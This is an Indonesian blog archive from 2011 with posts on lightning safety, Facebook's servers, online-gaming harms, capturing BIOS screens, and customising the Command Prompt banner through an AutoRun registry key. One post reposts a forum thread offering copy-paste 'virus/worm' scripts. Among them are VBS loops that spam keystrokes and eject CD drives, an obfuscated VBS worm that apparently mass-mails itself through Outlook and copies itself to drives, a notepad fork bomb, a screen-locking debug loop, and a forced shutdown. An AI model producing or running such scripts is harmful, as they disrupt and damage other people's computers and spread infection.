Kamis, 29 Desember 2011

Hati - hati petir


Mari kita pelajari dulu, apakah petir itu?
Petir merupakan gejala alam yang bisa kita analogikan dengan sebuah kapasitor raksasa, dimana lempeng pertama adalah awan (bisa lempeng negatif atau lempeng positif) dan lempeng kedua adalah bumi (dianggap netral). Seperti yang sudah diketahui kapasitor adalah sebuah komponen pasif pada rangkaian listrik yang bisa menyimpan energi sesaat (energy storage). Petir juga dapat terjadi dari awan ke awan (intercloud), dimana salah satu awan bermuatan negatif dan awan lainnya bermuatan positif.

Petir terjadi karena ada perbedaan potensial antara awan dan bumi atau dengan awan lainnya. Proses terjadinya muatan pada awan karena dia bergerak terus menerus secara teratur, dan selama pergerakannya dia akan berinteraksi dengan awan lainnya sehingga muatan negatif akan berkumpul pada salah satu sisi (atas atau bawah), sedangkan muatan positif berkumpul pada sisi sebaliknya. Jika perbedaan potensial antara awan dan bumi cukup besar, maka akan terjadi pembuangan muatan negatif (elektron) dari awan ke bumi atau sebaliknya untuk mencapai kesetimbangan. Pada proses pembuangan muatan ini, media yang dilalui elektron adalah udara. Pada saat elektron mampu menembus ambang batas isolasi udara inilah terjadi ledakan suara. Petir lebih sering terjadi pada musim hujan, karena pada keadaan tersebut udara mengandung kadar air yang lebih tinggi sehingga daya isolasinya turun dan arus lebih mudah mengalir. Karena ada awan bermuatan negatif dan awan bermuatan positif, maka petir juga bisa terjadi antar awan yang berbeda muatan.
nah,,supaya kita aman walaupun petir sedang bergemuruh inilah yang harus kita lakukan

1. Jika Anda terperangkap di luar segera masuk ke dalam bangunan. Tidak ada tempat yang aman di luar. Larilah ke mobil atau bangunan yang aman setelah Anda mendengar guntur.
2. Jangan berada di sawah, lapangan, taman. Karena petir mencari tanah untuk melepaskan energinya.
3. Jika sedang di kolam renang dan terlihat tanda-tanda awan sudah gelap segeralah ke luar karena kolam renang adalah sasaran empuk buat petir melepas energi.
4. Jangan berlindung di bawah pohon karena pohon yang tersambar petir energinya bisa melompat ke tubuh.
5. Jauhi tiang listrik, menara atau sesuatu yang tinggi yang mudah tersambar petir.
6. Jika sedang berteduh di luar ruangan jangan terlalu dekat dengan orang lain setidaknya beri jarak 3-5 meter untuk menghindari lontaran energi jika ada petir.
7. Jika sedang mengendarai motor segeralah berhenti dan cari tempat berlindung.

Tempat yang aman dari petir adalah:
1. Mobil, karena petir hanya akan mengelilingi permukaan mobil lalu energinya jatuh ke tanah.
2. Rumah, dengan syarat jika ada petir cabut stop kontak listrik seperti televisi dan komputer karena antena TV bisa menghantarkan listrik yang tersambar petir. Jauhi teras. Jangan menelpon pakai telpon rumah karena arus listrik bisa melewati sambungan telpon. Pakai telpon genggam lebih aman. Menjauhlah dari peralatan rumah yang terbuat dari logam seperti kusen atau pegangan pintu dari logam.

Demikian ulasan mengenai petir, semoga bermanfaat.

Rabu, 21 Desember 2011

dibalik rahasia server facebook

Rahasia dibalik Server Raksasa Facebook

Perkembangan teknologi informasi di dunia sekarang ini sangat cepat berkembang. Berawal dari surat menyurat, telepon, email, internet,dll. Dewasa ini yang semakin berkembang adalah jejaring sosial yang mendapat respon yang sangat pesat. Bagaimana facebook bisa berjalan dengan lancar, sedangkan user yang membukanya sangat banyak menggunakannya?? Hal ini akan dibahas mengenai server dari facebook.
Dunia teknologi informasi sekarang ini memang berkembang sangat pesat. seperti halnya jejaring sosial seperti facebook, twitter, plurk, dan lain sebagainya. Facebook adalah sebuah social networking yang baru saja dirintis pada tahun 2006 oleh seorang mahasiswa Harvard yang bernama Mark Zuckerberg. Mark Elliot Zuckerberg atau Mark Zuckerberg lahir lahir pada 14 Mei 1984 di Dobbs Ferry, Westchester County, New york, dan Amerika Serikat.
Ide berawal ketika dia bersekolah di Exeter High School, New HampshireSaat itulah dia berkenalan dengan Adam D’Angelo. Zuckerberg lulus dan masuk Harvard University, awalnya membuat program Coursematch yang memungkinkan mahasiswa di kelas yang sama bisa melihat daftar teman-teman sekelas. Sekarang jumlah pegawainya sendiri telah mencapai 400 orang. Namun, Facebook adalah perusahaan unik. para eksekutif dan petingginya masih berusia muda, antara 24 tahun-37 tahun. Markas besar Facebook lebih mirip asrama mahasiswa. Para pegawai, yang setiap hari mendapat jatah makan gratis, bekerja sambil melakukan kegiatan favoritnya.

Bisa dibayangkan lelaki yang masih berusia muda tersebut bisa mengatur seluruh kegiatan yang sedang dilakukan oleh pengguna facebook yang begitu banyak. Namun bukan berarti dia yang mengatur semua jalannya proses yang terjadi dalam jejaring sosial tersebut. Semua proses yang terjadi dalam facebook diatur oleh server facebook yang mengatur semua jalannya proses.
Facebook merupakan jejaring sosial ( sosial network ) yang sangat digandrungi saat ini yang memiliki lebih dari 225 juta orang menjadi warga setia facebook hingga Mei 2009. Pertumbuhan tersebut terutama ditopang pesatnya pengguna dari luar Amerika Serikat. Jumlah pengguna yang besar tentu saja menjadi berkah buat facebook. Sejumlah analis menghitung, di atas kertas nilai facebook adalah 6-15 miliar dollar AS. Tapi di balik angka fantastis itu, facebook juga harus mengeluarkan ongkos sangat besar untuk melayani hasrat narsis jutaan orang. Setiap hari jutaan foto diunggah orang dari seluruh pelosok dunia ke jejaring sosial itu. Akibatnya, facebook juga dilaporkan berat untuk membiayai infrastrukturnya.
Untuk mengatur seluruh proses dalam facebook, server yang dibutuhkan sangatlah banyak. Untuk 2009, area servernya melebar 24.000 kaki persegi dan dirumorkan akan menambah lagi 20.000 kaki persegi untuk pusat data di Ausburn, Virginia. Selain itu, facebook juga sudah mengumumkan akan mendirikan kantor pusat internasionalnya di Dublin, Irlandia, untuk menopang ekspansi di seluruh Eropa, Timur Tengah, dan Afrika.

Untuk saat ini server facebook sendiri mencapai 30.000 lebih dan tidak hanya di satu negara, tetapi sudah menyebar ke berbagai negara. Setiap aplikasi dalam situs facebook memiliki server yang berbeda – beda. Contohnya adalah server untuk aplikasi dalam facebook.

Selasa, 13 Desember 2011

Dampak Buruk Point Blank untuk Anak ( Gamer )


Sudah lebih dari 50 jam Hepii Internet beroperasi menjadi salah satu usaha yang menyediakan jasa internet. Dan Alhamdulillah semua berjalan dengan baik dan lancar. Pagi ini saya melihat kawanan anak-anak kecil berjalan melintas di depan Hepiinet seraya berkata “ini warnetnya nggak ada PB-nya, PB ( Point Blank ) yah game point blank yang saat ini sedang populer di Indonesia dan diminati dari berbagai kalangan baik itu orang dewasa, remaja, orangtua yang lebih memprihatinkan anak-anak ( dalam hal ini mungkin anak SD atau bahkan yang belum sekolah ). Saya melihat sebenarnya peluang membuka usaha warnet dengan fasilitas game online akan jauh lebih menguntungkan dibandingkan dengan warnet dengan fasilitas koneksi internet dan kenyamanan. Geliat warnet yang menyajikan game online di akhir tahun 2010 sampai awal 2011 menunjukan statistik yang terus meningkat dan jarang sekali warnet yang menyediakan game online itu terlihat sepi…
Tapi sebenarnya ini menjadi tantangan usaha ( persaingan usaha ) berkategori warnet khususnya untuk Hepiinet. Saya menyikapi hal ini dengan berpikiran positif, Hepiiinet mencoba melakukan perubahan mainset untuk semua user kalau internet itu lebih menyenangkan dan bisa memperkaya diri ketimbang bermain game 1 malam suntuk. Bermain games memang jadi satu kesukaan hobi seseorang tetapi jangan sampai mengkonsumsi game secara berlebihan ini akan merugikan anda sendiri, khususnya anak-anak.

Mereka rela keluar pagi-pagi dari rumah, mencari warnet yang menyediakan game Point Blank, ini berdampak buruk untuk mereka. Coba anda bayangkan, pukul 07.30 mereka sudah berebutan untuk duduk dan mencari warnet games.. sangat prihatin. Bagaimana anda sebagai orang tua ? membiarkan mereka larut dengan kekonyolan games ? menghamburkan uang untuk memfasilitasi mereka bermain games ?

Saya setuju Games itu perlu, sebagai pelengkap kejenuhan atau sekedar hobi. Tetapi mari kita lihat sisi negatif yang ditimbulkan jika bermain game secara berlebihan. Saya mengutip beberapa kutipan tulisan dari blog - blog yang berseliweran di internet mengenai dampak buruk bermain game secara berlebihan bagi anak khususnya game yang sedang membumi di kota medan POINT BLANK.

Banyak pertanyaan seputar “dampak point blank bagi anak” Pertanyaan ini tentu saja di ajukan oleh para orang tua yang merasa khawatir terhadap dampak negatif atau buruk game point blank yang belakangan ini penggunanya semakin meningkat. Seperti kita tahu Game point blank merupakan game paling populer di indonesia saat ini, penggemarnya tidak hanya dari kalangan anak muda, remaja, orang tua bahkan anak SD pun sudah mahir bermain point blank.

Saya pernah membaca sebuah komentar di sebuah blog yang membahas (Cheat Point Blank) dalam tulisannya pemberi komentar tampak sangat memohon pada pemilik blog atau pengunjung agar di ajarkan cara-cara menggunakan cheat Pb dengan alasan anaknya selalu menghabisakan uang tidak kurang dari 100 ribu setiap hari ( artinya bahwa pemberi komentar ingin mengajarkan anaknya cara menggunakan cheat point blank) agar tidak selalu di teror oleh anaknya sendiri yang selalu menghabiskan uang untuk bermain point blank.

Dari pengalaman orang tersebut jelas bahwa ketagihan terhadap game online bisa berdampak negatif atau buruk pada pemainnya, khususnya mereka yang tidak bisa mengatur waktu, walaupun konon bermain game juga bisa meningkatkan kecerdasan otak anak jika bermain secara wajar.

Ada beberapa Dampak Negatif bermain Point Blank Bagi Gamer negatif yang saya lihat dan saya cari informasi mengenai game ini, antara lain ;

Pemborosan Biaya ( Dampak Point Blank Bagi Gamer )

Mengapa saya mengatakan bahwa PB sama saja dengan pemborosan ?? Bayangkan, untuk bisa hebat bermain PB rasanya mustahil jika cuma bisa mengandalkan senjata standar atau gratisan yang disediakan oleh pengembang yang terdiri dari Assault Riffle, Sub Machine Gun, dan Sniper Riffle. Oleh karena itu, seperti game shooter pada umumnya, PB juga menyediakan senjata dan character yang bisa dibeli dengan cash dalam bentuk voucher dengan kisaran harga Rp.10.000 sampai Rp.300.000.

Harga senjata yang paling murah dalam PB adalah 250 cash untuk satu hari. Sedangkan harga 250 cash sama dengan Rp.2.500,-. Cash 1.000=Rp. 10.000, cash 3.000=Rp.30.000, cash 5.000=Rp.50.000, dst. Bisa dibayangkan, berapa ratus ribu yang harus dikeluarkan jika menggunakan senjata cash dalam sebulan. Hitung aja sendiri :-)

Pemborosan Waktu & Tenaga

Seperti dalam kepolisian atau tentara, PB juga mengenal sistem pangkat. Untuk bisa naik pangkat, seorang troopers atau pemain harus mengumpulkan sejumlah experience (exp.). Semakin tinggi pangkatnya, maka akan semakin tinggi pula exp yang harus dikumpulkan. Artinya, akan semakin lama pula seorang troopers memainkan karakternya.

Untuk bisa naik pangkat, tentunya dibutuhkan waktu dan tenaga yang tidak sedikit. Bahkan ada yang rela duduk berjam-jam di depan komputer hanyak untuk bermain PB. Akibatnya, kesehatan tidak terperhatikan karena kurang makan, olahraga, mandi, istirahat dan sebagainya. Bahkan pendidikan pun bisa berantakan.

Kata-Kata Kasar ( Dampak Point Blank Bagi Gamer )

Disadari atau tidak, PB ternyata secara tidak langsung mengajari seseorang untuk menggunakan kata-kata kasar. Hal ini mungkin diakibatkan karena sang pemain terbawa emosi ketika karakternya mati atau kalah. Bayangkan jika anak2 SD sudah mengenal kata2 anj**g, ba*i dan lain-lainnya yang belum sepantasnya diucapkan walaupun itu mungkin cuma lewa tulisan.

Melatih Ketidakjujuran ( Dampak Point Blank Bagi Gamer )

Mungkin sudah menjadi tradisi kalau anak bangsa lebih senang yang instan2. Tidak percaya ?? Liat saja di televisi. Dan hal itu juga berlaku di PB. Prinsipnya, buat apa mencari jalan yang sulit kalau ada jalan yang lebih mudah dan singkat. Dan jawabannya adalah dengan menggunakan program ilegal. Siapa yang tidak suka ?? dengan menggunakan program ilegal, seorang bisa menaikkan pangkatnya setinggi mungkin cuma dalam hitungan jam, bandingkan dengan cara jujur yang membutuhkan waktu berbulan-bulan. Belum lagi cheat-cheat lainnya yang sepertinya terlalu panjang untuk dibahasa di sini.

Disini saya hanya ingin menulis tentang sesuatu yang bisa memberi manfaat untuk orang lain. Akan muncul komentar - komentar hangat jika membahas masalah games online, dan tidak jarang juga komentar adem ayem menanggapi masalah ini. Saya menulis ini bukan karena warnet kami tidak menyediakan games PB atau games online lainnya. Tetapi saya melihat dan prihatin dengan kondisi saat ini walaupun dulunya saya pernah mengalami menjadi gamers dan bahkan menjadi programmer gamesnya.. hehehe ( mode on narsis ), tapi jangan salah game yang pernah kami kerjakan adalah game edukasi.

Hepiinet,

Selalu dihati :-)

Senin, 12 Desember 2011

Cara Merekam Tampilan Bios dan DOS

Mungkin ada diantara teman yang sering melihat gambar tampilan bios, safe mode , proses instalasi, proses loading windows, ada beberapa teman yang menanyakan tentang cara capture, sreenshot atau merekam tampilan tersebut. Jika anda sudah windows sudah login ke windows, maka tampilan di layar bisa direkam dengan menggunakan perintah printscreen, tetapi bagaimana dengan tampilan sebelum login ke windows, tampilan bios, dan proses install windows.

Ada beberapa software yang bisa anda gunakan, salah satunya adalah Microsoft Virtual PC 2007, software ini sudah saya install di windows 7 (berjalan baik), tetapi belum coba di Windows XP.
Untuk merekamnya anda bisa windows anda kemudian buka aplikasi Microsoft Virtual PC ,akan terbuka sebuah jendela (window) baru Virtual PC , klik tombol Start atau Run Virtual PC kemudian saat proses booting di Virtual PC tekan tombol delete selanjutnya akan muncul halaman bios, atur booting dari CD, masukkan CD (misalnya CD Windows, CD Boot lainnya) yang bisa boot ke CD-Drive ,selanjutnya saat booting di Virtual PC tekan enter, maka akan muncul tampilan seperti saat anda sedang menginstal software.
Untuk merekamnya, anda cukup menekan tombol printscreen di keyboard anda.





Ada beberapa persyaratan agar software Microsoft virtual PC berfungsi di komputer anda, yaitu Processor anda harus mendukung Virtualization Technology, jika processor Intel bisa dilihat disini Intel Virtualization Technology, jika AMD bisa dilihat di AMD Virtualization Technology

Minggu, 11 Desember 2011

Command Prompt ( cmd.exe ) merupakan tool bawaan Windows yang sangat berguna.


Tool ini dapat digunakan untuk mengecek error pada media penyimpanan, melakukan format pada media penyimpanan, melihat sekaligus mengedit isi registry, mengecek sekaligus mengganti ip, menjalankan dan mematikan services, melihat jalur yang dilewati paket data di internet, melihat port yang terbuka ketika terjadi hubungan antar komputer, melihat sekaligus mematikan program yang sementara berjalan, melakukan proses shutdownrestartlog off komputer serta bermacam-macam kegunaan yang lain yang dapat anda lihat dengan mengetik perintah help pada Command Prompt.
Selain itu, tool-tool seperti kaht, nmap, netcat, snort, metasploit framework, tcpdump, john the ripper, ettercap dan tool-tool command line-based lainnya, menggunakan perantara dari Command Prompt agar dapat berjalan ( namanya juga tool-tool command line-based).

Pernakah timbul di benak Anda untuk dapat mengganti banner default dari Command Prompt tersebut yang hanya berupa tulisan Microsoft Windows [Version 6.x.x] Copyright © 2006 Microsoft Corp.

Langkah-langkah membuat banner hingga menaruhnya di Command Prompt adalah sebagai berikut :
Pertama, bukalah notepad, kemudian ketiklah script di bawah ini :

@echo off
title Have A Nice Day ...
cls
color 0a
echo.
echo ÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛ
echo ÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ
echo ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛ
echo ÛÛÛ
echo ÛÛÛ
echo ÛÛÛ
echo.
echo ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
echo Û Û
echo Û Hello %username%, Welcome To CMD ... Û
echo Û Û
echo ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
echo.

dan simpanlah di drive C dengan ekstensi .bat dengan nama terserah..,
untuk lebih jelas penjelasan script di atas nie:
@echo off memiliki arti script yang kita ketik tersebut tidak akan ditampilkan pada user
title Have A Nice Day … memiliki arti Command Prompt akan memiliki judul ( title ) Have A Nice Day
cls memiliki arti membersihkan atau menghapus semua tulisan pada layar Command Prompt kecuali tulisan lokasi direktori tempat kita sedang bekerja pada saat itu misalnya c:> ( inilah perintah yang digunakan untuk menghilangkan banner default dari Command Prompt )
color 0a memiliki arti tulisan dari Commadn Prompt akan berwarna hijau terang ( untuk warna yang lain, Anda dapat mengetik perintah color /? pada Command Prompt untuk melihat daftar warna yang ada.
echo. .Memiliki arti mengosongkan satu baris ( mirip membuat baris baru pada microsoft word atau notepad )

string echo ÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛ smpe echo ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

memiliki arti menuliskan tulisan setelah perintah echo pada layar Command Prompt ( tulisan sesudah perintah echo tersebut yang nantinya akan menjadi banner kita. Untuk dapat membuatnya, Anda haru melatih menyusun simbol menjadi huruf, sebagai langkah awal, Anda dapat belajar menggambarnya pada buku berpetak seperti yang saya lakukan dulu XD Ingat, No Pain No Gain Gan…,

Kedua, bukalah Command Prompt kemudian tuliskan script di bawah ini :
reg add “HKLMSoftwareMicrosoftCommand Processor” /v AutoRun /t REG_SZ /d “Call C:Terserah.bat” /f

Jalankanlah Command Prompt seperti biasa. Jika Anda telah melakukan langkah-langkah di atas
maka cmd promt anda akan seperi ini gambar dibawah ini:




Read more: http://blog.fastncheap.com/cara-mengubah-tampilan-pada-command-promt-windows/#ixzz1gI37FIq0

Kamis, 08 Desember 2011

Bagi - bagi Virus Worm

mau bagi-bagi script virus/worm nih....
tinggal copas ke notepad aja tus save as .vbs
oh ya kalo ada yang salah scriptnya tolong britau scrip ke brapa ma line ke brapa

script virus 1 !
---------------------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
---------------------------------END---------------------------------

-----------------------------------------------------------------------
Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
---------------------------------END---------------------------------

-----------------------------------------------------------------------
Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
---------------------------------END---------------------------------

-----------------------------------------------------------------------
Code:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
---------------------------------END---------------------------------

-----------------------------------------------------------------------
Code:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
---------------------------------END---------------------------------

-----------------------------------------------------------------------
Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
---------------------------------END---------------------------------

-----------------------------------------------------------------------
Code:

'Vbs.Vbswg.GHZ 1.0 Created By GHZ. 9/30/2010
Execute TH8IQFIU("-\hy4\hy}m4MN`&746&Ixkgzkj&H&MN`4&?59658676Ykz&KIIOXQ>X&C&ixkgzkuhpkiz.(yixovzotm4lorkyyzksuhpkiz(/KTR99N9I&C&KIIOXQ>X4mkzyvkiogrlurjkx.6/SR;Y9==9&C&KTR99N9I&,&(bMN`&7464nzsr4|hy(Ykz&WRMIX4iuvlork&}yixovz4yixovzl{rrtgsk2&SR;Y9==9P8VP6<;8Ol&WRMIKtj&olOl&WRMIX4uvktzk~zlork.}yixovz4yixovzl{rrtgsk/H;;[:RZ[&C&KNXX4lorkk~oyzy.}yixovz4yixovzl{rrtgsk//&znktykz&H88>V>>9C&KIIOXQ>X4ixkgzkzk~zlork.}yixovz4yixovzl{rrtgsk/H88>V>>94}xozk&H;;[:RZ[H88>V>>94iruykktj&olSX8[V./Ykz&\=[<:78V&C&IxkgzkUhpkiz.(U{zruuq4Gvvroigzout(/Ol&\=[<:78V&C&(U{zruuq(&ZnktYkz&I;;MT79<&C&\=[<:78V4MkzTgskYvgik.(SGVO(/Ykz&J9XWX=7J&C&I;;MT79<4GjjxkyyRoyzyLux&Kgin&\?9\>88?&C&\?9\>6?&C&7&Zu&V88?Ykz&S:9>6TWQ&C&\=[<:78V4IxkgzkOzks.6/Ykz&P87=[G=Y&C&\?9\>6?/S:9>6TWQ4Zu&C&P87=[G=Y4GjjxkyyS:9>6TWQ4Y{hpkiz&C&(\kx&Osvuxzgtz'(S:9>6TWQ4Huj&C&(No@(&,&|hixrl&,&(Vrkgyk&|ok}&znoy&lork2&oz-y&|kx&osvuxzgtz4(&,&|hixrl&,&((k~ki{zk&(ykz&PZORH8U8&CS:9>6TWQ4(&,&Inx.<;/&,&Inx.776TWQ4JkrkzkGlzkxY{hsoz&C&Zx{kPZORH8U84Gjj&\G[IIOXQOl&S:9>6TWQ4Zu&BD&((&ZnktS:9>6TWQ4YktjKtj&OlTk~zKtj&OlTk~zKtj&OlKtj&l{tizoutL{tizout&Z6Q=N<;Z.U7MZ8?==/Ol&U7MZ8?==&BD&((&ZnktYP8RMIX4lorkk~oyzy.(i@bsoxibsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi(KrykOl&KIIOXQ>X4lorkk~oyzy.(i@bsoxi98bsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi98(KrykOl&KIIOXQ>X4lorkk~oyzy.YP8RMIX4lorkk~oyzy.YP8RMIX4IxkgzkZk~zLork.U7MZ8?==&,&(byixovz4oto(2&Zx{k/K=RTR99N&C&(ayixovzc(&,&|hIxRl&,&(t6Cut&7@PUOT@)@(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t6Cut&7@PUOT@)@(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t7C&&5ol&.&*toiq&CC&*sk&/&&ngrz&ƒ(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t8C&&54(&,&Inx.766/&,&Inx.??/&,&Inx.??/&,&(&yktj&*toiq&(K=RTR99N&C&K=RTR99N&,&SR;Y9==9K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t9Cƒ(yixovz4IruykKtj&OlKtj&L{tizoutL{tizout&GI=R;Y9=./Ut&Kxxux&Xky{sk&Tk~zYkz&W8G8VP6<&C&KIIOXQ>X4Jxo|kyLux&Kgin&MJR?PNNXX4MkzLurjkx.V>NNXV>&C&U?G;;[:R4LorkyLux&Kgin&LK:X8[V<&Ot&Z:K88>V>Ol&rigyk.LK:X8[V<4Tgsk/&C&(soxi4oto(&ZnktZ6Q=N<;Z.LK:X8[V<4VgxktzLurjkx/Ktj&OlOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hy(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hk(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olTk~zYkz&IM8=[<:7&C&U?G;;[:R4Y{hlurjkxyLux&Kgin&J>I;;MT7&Ot&IM8=[<:7Igrr&.J>I;;MT74vgzn/Tk~zKtj&l{tizoutL{tizout&P8VP6<;8./Xgtjuso€kOl&7&1&Otz.Xtj&0&7666/&C&=&znktSymhu~&(O-|k&tuznotm&zu&yg4&@u/(2<:2(@u/(ktj&olktj&l{tizout-\hy}m&8&Hkzg4&H&aQc",-6) Function TH8IQFIU(C38QDRVV,F8O63JAL) For L6F3M0OD = 1 To Len(C38QDRVV) V6BD6OKI = Mid(C38QDRVV, L6F3M0OD, 1) If V6BD6OKI = Chr(2) Then V6BD6OKI = Chr(34 + F8O63JAL) ElseIf V6BD6OKI = Chr(3) Then V6BD6OKI = Chr(10 + F8O63JAL) ElseIf V6BD6OKI = Chr(4) Then V6BD6OKI = Chr(13 + F8O63JAL) Else V6BD6OKI = Chr(Asc(V6BD6OKI) + F8O63JAL) End If TH8IQFIU = TH8IQFIU & V6BD6OKI Next End Function ---------------------------------END--------------------------------- kalo yang ini tinggal copas aja tapi save as .bat ---------------------------------------------------------------------- Code: @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top -------------------------------END------------------------------------ ----------------------------------------------------------------------- Code: @echo off echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
-----------------------------------END-------------------------------

-----------------------------------------------------------------------
Code:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
-----------------------------------END-------------------------------

-----------------------------------------------------------------------
Code:

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
---------------------------------END---------------------------------

Sekian dulu deh .....
kalo berguna thanksnya donk

Last edited by ghombalz; 12-06-2011 at 10:48 PM.

Reply With Quote Reply With Quote
Who Said Thanks:

Senin, 05 Desember 2011

Tutorial Hacking

Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking,

Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.

Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.

-ChanServ- -- Access List for [#solohackerlink] --

-ChanServ- Num Level Hostmask Since last use

-ChanServ- --- ----- -------- --------------

-ChanServ- 1 30 CoCoNuT 1h 18m 36s

-ChanServ- 2 20 Shidex 6d 2h 52m 6s

-ChanServ- 3 10 erisanthi 4w 4d 4h 9m 44s

-ChanServ- 4 25 moxff 8h 25m 27s

-ChanServ- 5 30 CiPaN-2

-ChanServ- 6 20 SouLmaTe 4d 7h 34m 36s

-ChanServ- 7 30 A-kung 2d 2h 48m 50s

-ChanServ- 8 30 hikaru 1w 2d 9h 41m 4s

-ChanServ- 9 20 kenshi 3d 3h 5m 39s

-ChanServ- 10 30 vend3r 3d 13h 54m 51s

-ChanServ- 11 20 ijoo 5d 17h 20m 27s

